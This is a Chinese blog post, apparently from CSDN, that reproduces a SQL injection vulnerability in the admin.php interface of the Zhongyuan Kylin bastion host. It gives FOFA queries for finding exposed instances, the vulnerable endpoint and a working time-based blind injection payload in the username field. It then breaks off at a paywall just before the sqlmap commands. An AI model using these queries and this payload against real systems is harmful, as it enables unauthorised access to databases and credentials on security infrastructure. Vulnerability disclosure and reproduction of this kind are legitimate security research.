中远麒麟堡垒机SQL注入漏洞复现

已于 2023-11-08 00:06:22 修改
阅读量415 收藏
点赞数
分类专栏: 漏洞复现 文章标签: sql
于 2023-11-07 23:20:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/134277909
版权
漏洞复现 专栏收录该内容
36 篇文章 9 订阅 ¥9.90 ¥99.00
订阅专栏

简介

中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。

漏洞复现

FOFA语法:

body="url=\"admin.php?controller=admin_index&action=get_user_login_fristauth&username="

或者

cert.subject="Baolei"

访问界面如下所示:

POC:  /admin.php?controller=admin_commonuser

GET请求如下:

payload:   

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

POST请求后页面返回时间延长5秒证明漏洞存在

SQLMAP命令&#x

了解本专栏 订阅专栏 解锁全文
Cheng-Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
中远麒麟堡垒机admin_commonuserSQL注入漏洞
xiaokp7的博客
09-13 422
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
中远麒麟堡垒机tokensSQL注入漏洞
xiaokp7的博客
09-13 287
中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
中远麒麟堡垒机管理员手册1
08-03
5.2.1 添加用户 15 5.2.2 批量添加用户 17 5.2.3 批量编辑用户 18 5.10 5.11 5.12 5.12.1 应用发布服务器 29 5
中远麒麟堡垒机软部署
QuJJan的博客
01-17 1134
添加软件源,这里添加的是阿里源(yum-config-manager --add https://mirrors.aliyun.com/centos-stream/9-stream/Baseos/x86_64/os)Rocky配置阿里云源(wget -O /etc/yum.repos.d/Rocky-BaseOS.repo http://mirrors.aliyun.com/repo/Centos-8.repo)套壳并运行直接输入的命令1.(bash yum.sh)2.(bash install.sh)
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_84264010的博客
05-08 1131
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
北京中远麒麟堡垒机接口存在SQL 注入漏洞-1day未公开漏洞
weixin_43167326的博客
02-26 597
中远麒麟堡垒机是一款集堡垒机、运维审计、权限管控、风险分析、日志分析等功能于一体的安全运维审计系统。SQL注入是一种常见的网络攻击手段,攻击者可以通过在输入字段中插入恶意的SQL代码,从而绕过应用程序的安全机制,对数据库进行非法操作,如读取、修改、删除数据等。
漏洞复现--中远麒麟堡垒机SQL注入
qq_53003652的博客
10-06 364
麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。自行寻找厂家发布的安全补丁,若暂无补丁,尽快将系统放入内网。漏洞存在sqlmap直接利用。需要下载的可后台私我我发你。
中远麒麟堡垒机手册V1.6.docx
07-16
中远麒麟堡垒机手册V1.6》是关于中远麒麟堡垒机的详细操作指南,旨在帮助用户正确安装和管理这款系统。堡垒机是一种专用于安全审计和访问控制的设备,它在网络安全中扮演着重要角色,尤其在管理远程服务器的访问时...
中远变频器在风机节能应用的解析
10-22
目前在我国各行各业的各类机械与电气设备中与风机水泵配套的电机约占全国电机装机量的65%,耗用电能约占全国发电总量的五分之二。并且大多数风机、水泵在使用过程中都存在大马拉小车的现象。因生产、工艺及气温等方面...
中远变频器在风机节能上的应用
10-25
标题中的“中远变频器在风机节能上的应用”指的是使用中远品牌的变频器来优化风机的运行,以达到节能减排的目的。风机广泛应用于各行各业,其所配套的电机消耗的电能占全国总发电量的很大比例。然而,很多情况下,...
6.21中远备份.zip
06-21
"6.21中远备份.zip"这个文件名可能指的是在2022年6月21日进行的一次中远距离的数据备份操作,通常这样的命名方式是为了记录备份的时间点,便于管理和恢复。"中远备份"标签进一步强调了这是一个远离原始数据存储位置...
北京中远麒麟科技有限公司麒麟堡垒机controller新接口存在SQL注入漏洞
weixin_43167326的博客
03-20 840
某远麒麟堡垒机是一款专业的网络安全设备,能够为企业提供强大的网络安全防护服务。它采用先进的智能算法和技术,能够在企业内部构建一道坚固的安全防线,有效地保护企业的网络不受来自外部和内部的攻击和威胁。该设备具有高可靠性、高扩展性和灵活性等优点,能够满足不同规模企业的安全需求。同时,该设备也支持多种安全防护功能,如流量管理、入侵检测、反病毒、VPN、WEB过滤等,确保企业的网络安全稳定可靠。此系统某接口存在SQL注入漏洞,攻击者可以攻击数据库,造成重要信息泄露。
麒麟开源堡垒机安装部署测试及优缺点总结
cijia1963的博客
04-04 408
近期出于管理和检查需要,单位领导要求上堡垒机系统,测试了几个商业堡垒机,因为价格超过预算等原因都未购买,又测试了三个开源的堡垒机,感觉麒麟开源堡垒机功能最全,基本上和商业堡垒机一样,唯一的问题就是图形部分不开源,但因为我们的服务器基本上全是LINUX环境,TELNET、SSH、FTP、SFTP...
麒麟堡垒机代码审计
jary__D的博客
11-27 525
一次针对PHP堡垒机的代码审计
中远麒麟堡垒机测试
weixin_44786696的博客
03-16 1162
摘要: 近期出于管理和检查需要,单位领导要求上堡垒机系统,测试了几个商业堡垒机,因为价格超过预算等原因都未购买,又测试了三个开源的堡垒机,感觉麒麟开源堡垒机功能最全,基本上和商业堡垒机一样,唯一的问题就是图形部分不开源,但因为我们的服务器基本上全是LINUX环境,TELNET、SSH、FTP、SFTP已 近期出于管理和检查需要,单位领导要求上堡垒机系统,测试了几个商业堡垒机,因为价格超过预算等原因...
开源堡垒机RDP窗口名称和文字识别功能------------麒麟开源堡垒机技术识别篇
weixin_34007906的博客
04-08 540
开源堡垒机除了录相,还需要做操作识别,主要的操作识别功能包括:Ssh/telnet的操作命令识别ftp/sftp的操作命令识别 RDP/VNC/X11 的打开窗口title识别 RDP/VNC/X11 窗口中的文字识别 RDP 剪切版内容识别 RDP/VNC/X11键盘记录 对于一个只能录相的开源堡垒机,其可用性是非常差的,因为开源堡垒机的审计功能主...
尝试麒麟开源堡垒机遇到的几个小问题
运维小菜鸡的学习笔记
11-09 3924
最近因为安全审计需要最近尝试了一下麒麟开源堡垒机,,记录一下遇到的一些问题。 网卡:我选择的直接使用官方镜像(比较无脑),创建虚拟机时记得配双网卡,IP地址只需要修改100段那张。 ssh端口:2288 root/blj2015BLJ web https://ip admin/12345678 终端用户需要安装VC++2010运行库,然后在堡垒机web下载堡垒机插件。缺少上述组建无法调用
什么是堡垒机?个人经验推荐优质堡垒机
weixin_33769207的博客
11-02 515
1.前言笔者曾经在国内某ERP厂商担任过产品经理,现就职于某互联网公司担任运维主管,对堡垒机的选型及具体应用实践有一定的发言权,故形成此文,权当抛砖。2.堡垒机是用来解决“运维混乱”的堡垒机是用来干什么的?简而言之一句话,堡垒机是用于解决“运维混乱”的。何谓运维混乱?当公司的运维人员越来越多,当需要运维的设备越来越多,当参与运维的岗位越来越多样性,如果没有...
堡垒机哲学史 | 三个问题:堡垒机从哪里来?到哪里去?是什么?
qizhitech的博客
06-13 2294
堡垒机哲学史 三个问题:堡垒机从哪里来?到哪里去?是什么? 作者:gogo 一、缘起:堡垒机从哪里来? ——无风不起浪,从需求中来 2005年,中国,我在某互联网公司的安全部门,面临3个问题。 1. 运维部门的需求 那时候,数据中心的运维管理人员的技术水平还处于“社会主义初级阶段“,经常会出现一些低级的误操作,导致网站突然无法正常访问,解决问题基本靠在人堆里吼一声”谁TM干的”。痛苦在于,误操...
中远海运webpack
08-11
中远海运使用webpack是为了实现前端项目的模块化打包和构建工作。webpack是一个现代化的前端构建工具,它可以将各种前端资源(如JavaScript、CSS、图片等)进行打包,并且支持代码的分割、懒加载、压缩等功能,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值